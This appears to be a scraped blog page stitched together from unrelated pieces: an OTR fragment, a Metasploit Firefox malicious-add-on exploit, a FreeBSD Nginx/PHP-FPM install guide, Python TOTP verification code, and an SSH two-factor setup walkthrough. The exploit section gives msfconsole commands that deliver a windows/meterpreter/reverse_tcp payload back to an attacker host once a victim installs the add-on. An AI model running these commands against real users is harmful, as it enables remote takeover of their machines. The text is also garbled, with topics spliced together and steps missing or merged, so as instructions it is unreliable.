Off-the-Record (OTR) Messaging allows you to have private conversations over instant messaging by providing:
This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks "install", the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be "bootstrapped". As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
getuid
sysinfo
http://www.exploit-db.com/exploits/18730/
Popular websites that run on Nginx are SourceForge, WordPress, and Hulu. By making Nginx run in FreeBSD, you can deliver light, efficient, powerful, stable and secure web server in a simple way.
What is PHP? I think you all already know and no need to explain further. The PHP handler we will use is FastCGI Process Manager (FPM), is an alternative PHP FastCGI implementation with some additional features useful for sites of any size, especially busier sites. This setup will surely deliver high-performance web service with low specs hardware.
1. Lets start by installing Nginx web server:
cd /usr/ports/www/nginx
make install clean
Once installation start, it will prompt nginx module selection page. You can select any Nginx module you want, but for me, I will select following module to be compiled right away:
[X] HTTP_MODULE Enable HTTP module
[X] HTTP_ADDITION_MODULE Enable http_addition module
[X] HTTP_CACHE_MODULE Enable http_cache module
[X] HTTP_DAV_MODULE Enable http_webdav module
[X] HTTP_FLV_MODULE Enable http_flv module
[X] HTTP_GEOIP_MODULE Enable http_geoip module
[X] HTTP_GZIP_STATIC_MODULE Enable http_gzip_static module
[X] HTTP_IMAGE_FILTER_MODULE Enable http_image_filter module
[X] HTTP_PERL_MODULE Enable http_perl module
[X] HTTP_RANDOM_INDEX_MODULE Enable http_random_index module
[X] HTTP_REALIP_MODULE Enable http_realip module
[X] HTTP_REWRITE_MODULE Enable http_rewrite module
[X] HTTP_SECURE_LINK_MODULE Enable http_secure_link module
[X] HTTP_SSL_MODULE Enable http_ssl module
[X] HTTP_STATUS_MODULE Enable http_stub_status module
[X] HTTP_SUB_MODULE Enable http_sub module
[X] HTTP_XSLT_MODULE Enable http_xslt module
2. Web server installation done. Make sure Nginx is enabled by adding following line to /etc/rc.conf:
nginx_enable="YES"
3. Before we configure and start the web server, we need to install PCRE, libtool, PHP with FPM and PHP extensions. Follow these steps:
cd /usr/ports/devel/pcre
make install clean
cd /usr/ports/devel/libtool
make install clean
cd /usr/ports/lang/php5
make install clean
During the selection module page, select FPM (FastCgi Process Manager).
cd /usr/ports/lang/php5-extensions
make install clean
4. Since PHP-FPM is a service, we need to add this in /etc/rc.conf:
php_fpm_enable="YES"
5. By default, there is no php.ini specified. So we need to copy the php.ini which has been prepared during port installation.
cp /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini
6. Start the PHP-FPM service :
/usr/local/etc/rc.d/php-fpm start
7. Now PHP-FPM already started at localhost port 9000. You can check this using netstat command. Lets create the web and logs directory used to host website (ignore this if you already have the directory):
mkdir /home/mydomain/public_html
mkdir /home/mydomain/logs
9. After that, we good to go. But before start Nginx it is good if we check the configuration first:
nginx -t /usr/local/etc/rc.d/nginx start
10. Now, Nginx and PHP-FPM should run correctly. If you do any changes on php.ini files or php extension file, you can restart PHP-FPM and reload Nginx:
/usr/local/etc/rc.d/php-fpm restart
/usr/local/etc/rc.d/nginx reload
To give the user the key, you’ll need to generate a cryptographically-secure 10 byte random key, presented to the user as a base32 16-character string. They can either enter this string directly, or you can use Google charts to provide a barcode that they can scan into the Google Authenticator application:
def get_barcode_image(username, domain, secretkey):
url = "https://www.google.com/chart"
url += "?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/"
url += username + "@" + domain + "%3Fsecret%3D" + secretkey
return url
For an example of what a code looks like, click here, or, look below:
After the user has a secret key from you and has entered it into Google Authenticator either by typing it in directly or scanning in the barcode, you have to be able to verify the key during login (for example). The code to authenticate is only a few lines in Python:
import time
import struct
import hmac
import hashlib
import base64
def authenticate(secretkey, code_attempt):
tm = int(time.time() / 30)
secretkey = base64.b32decode(secretkey)
# try 30 seconds behind and ahead as well
for ix in [-1, 0, 1]:
# convert timestamp to raw bytes
b = struct.pack(">q", tm + ix)
# generate HMAC-SHA1 from timestamp based on secret key
hm = hmac.HMAC(secretkey, b, hashlib.sha1).digest()
# extract 4 bytes from digest based on LSB
offset = ord(hm[-1]) & 0x0F
truncatedHash = hm[offset:offset+4]
# get the code from it
code = struct.unpack(">L", truncatedHash)[0]
code &= 0x7FFFFFFF;
code %= 1000000;
if ("%06d" % code) == str(code_attempt):
return True
return False
Source :
http://www.brool.com/index.php/using-google-authenticator-for-your-website
In case you’re not familiar with the term, this form of authentication requires something you have (in this case your mobile phone) and something you know (your password).
You’ll need either an iPhone, an Android enabled device or a Blackberry.
Before starting, go download and install the Google Authenticator to your phone.
First you need to install three prerequisites: gcc, mercurial and libpam0g-dev (make sure you either execute this steps asroot or use sudo):
$ apt-get update $ apt-get -yy install gcc mercurial libpam0g-dev
Now let’s clone the repo and install it:
$ cd ~ $ hg clone https://google-authenticator.googlecode.com/hg/ \ google-authenticator $ cd google-authenticator/libpam $ make install
You should see something like this:
... some gcc compilation output ... cp pam_google_authenticator.so /lib/security cp google-authenticator /usr/local/bin sudo chmod 755 /lib/security/pam_google_authenticator.so \ /usr/local/bin/google-authenticator
First, edit /etc/ssh/sshd_config and change the ChallengeResponseAuthentication from no to yes, here:
# Change to yes to enable challenge-response passwords (beware issues with # some PAM modules and threads) ChallengeResponseAuthentication no
It should now be:
# Change to yes to enable challenge-response passwords (beware issues with # some PAM modules and threads) ChallengeResponseAuthentication yes
Now, change the PAM configuration to include the Google Authenticator module. Edit /etc/pam.d/common-auth and insert a new line between the comment and the first auth line:
# here are the per-package modules (the "Primary" block) auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds
Leaving it this way:
# here are the per-package modules (the "Primary" block) auth required pam_google_authenticator.so auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds
Create a configuration for the current shell user:
$ google-authenticator https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/root@ some#some%3Fsecret%3DPKRTA4H5GLN7OTLA Your new secret key is: PKRTA4H5GLN7OTLA Your verification code is 613177 Your emergency scratch codes are: 80419043 52322813 46557473 35541313 66835603 Do you want me to update your "~/.google_authenticator" file (y/n) y Do you want to disallow multiple uses of the same authentication token? This restricts you to one login about every 30s, but it in creases your chances to notice or even prevent man-in-the-middle attacks (y/n) y
Now, copy and paste the generated URL to your browser and a QRCode will be generated:
Open the Google Authenticator app on your phone, choose Scan Barcode and point the camera to your browser. A new key should be added automatically to your list. This code will change every 30 seconds. Please note that if you don’t have a barcode scanner you will be prompted to install one.
If you’re still unsure how to use your phone’s app, please check these step by step instructions on Google Accounts help.
Also, save the scratch codes, they can be used when you don’t have your phone available.
You can repeat these steps for each user you want to add two factor authentication for.
Now save and exit your editor and restart the ssh daemon. IMPORTANT: do not close this ssh session after restarting the ssh service.
$ /etc/init.d/ssh restart * Restarting OpenBSD Secure Shell server sshd [ OK ]
Now open another ssh session and try to log in. You should now be prompted for the Verification code and your Password. Enter the code as it appears on your phone, and your usual password for the user:
$ ssh root@100.200.100.200 Verification code: Password: Linux ahost 2.6.32-24-generic-pae #39-Ubuntu SMP Wed Jul 28 07:39:26 UTC 2010 i686 Ubuntu 10.04.1 LTS Welcome to Ubuntu! * Documentation: https://help.ubuntu.com/ System information as of Sat Feb 19 01:06:03 EST 2011 System load: 0.0 Processes: 105 Usage of /: 30.6% of 4.85GB Users logged in: 1 Memory usage: 44% IP address for eth0: 100.200.100.200 Swap usage: 3% Graph this data and manage this system at https://landscape.canonical.com/ root@ahost:~#
If by any chance the authentication failed after a couple of tries, it’s recommended that you undo the changes you’ve made to /etc/ssh/sshd_config and to /etc/pam.d/common-auth, and restart the ssh daemon one more time. The authentication method should revert to password-only (or publickey, depending on what you had before).
